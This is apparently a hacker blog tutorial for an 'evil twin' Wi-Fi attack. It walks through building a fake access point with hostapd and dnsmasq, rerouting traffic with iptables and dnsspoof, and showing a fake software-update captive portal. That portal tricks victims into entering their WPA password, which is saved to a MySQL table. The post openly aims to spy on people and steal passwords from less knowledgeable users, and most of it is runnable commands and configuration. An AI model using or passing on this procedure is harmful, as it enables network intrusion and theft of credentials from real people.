Now evil twin is a very powerful attack used by many hackers to gain access to other's wifi
Evil twin attack can be performed easily, instead of writing scripts and using programs such as fluxin this attack can become handy.
Creating a fake access point can be useful in many scenarios.
We can monitor and spy on them and steal credentials and passwords they enter and we can steal wifi passwords without using a dictionary even if it is WPA or WPA2
Same method can be used to start a normal fake Ap or honeypot for other uses
A quick definition of an evil twin attack is
An attack when a hacker sets up a fake wifi network looks like a legitimate access point to steal victims sensitive details
Most often victims of such attacks are ordinary people having limited knowledge about security
When victim connects our fake access point we will display a page asking for a software update and victim have to enter the password and click enter and the password will store in our database management system which is MySQL
for displaying the page you can download templates using google
"evil twin attack can be done in number of ways"
Let's see what are steps involved in this attack
step1:- start a fake access point with same identical name as the target network
step2:- disconnect a client
step3:- wait for them to connect a fake access point.
step4:-once they connect, automatically display a page asking for a network key.
Let's get into the process,
# --- Preparing ---:
apt-get update
apt-get install hostapd dnsmasq apache2
airmon-ng start wlan0
mkdir ~/fap
cd ~/fap
nano hostapd.conf
# Instructions for hostapd.conf:
interface=[INTERFACE NAME]
driver=nl80211
ssid=[WiFi NAME]
hw_mode=g
channel=8
macaddr_acl=0
ignore_broadcast_ssid=0
nano dnsmasq.conf
# Instructions for dnsmasq.conf:
interface=[INTERFACE NAME]
dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h
dhcp-option=3, 192.168.1.1
dhcp-option=6, 192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
# Routing table and gateway:
ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
# Internet access:
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
# mysql database:
service mysql start
mysql
create database fap;
create user fapuser;
grant all on rogueap.* to 'fapuser'@'localhost' identified by 'fappassword';
use fap;
create table wpa_keys(password1 varchar(40), password2 varchar(40));
ALTER DATABASE fap CHARACTER SET 'utf8';
select * from wpa_keys;
# Captive portal setup:
rm -rf /var/www/html/*
mv ~/Downloads/fap.zip /var/www/html
cd /var/www/html
unzip fap.zip
service apache2 start
# --- Starting the attack ---:
hostapd hostapd.conf
dnsmasq -C dnsmasq.conf -d
dnsspoof -i wlan0mon
number of people fall for this attack and that's it for today comment below how did u perform this attack
thank you for reading our blog,
hope your enjoying our content and share our blog,
credits:-
spidyboy dark rider.
0 Comments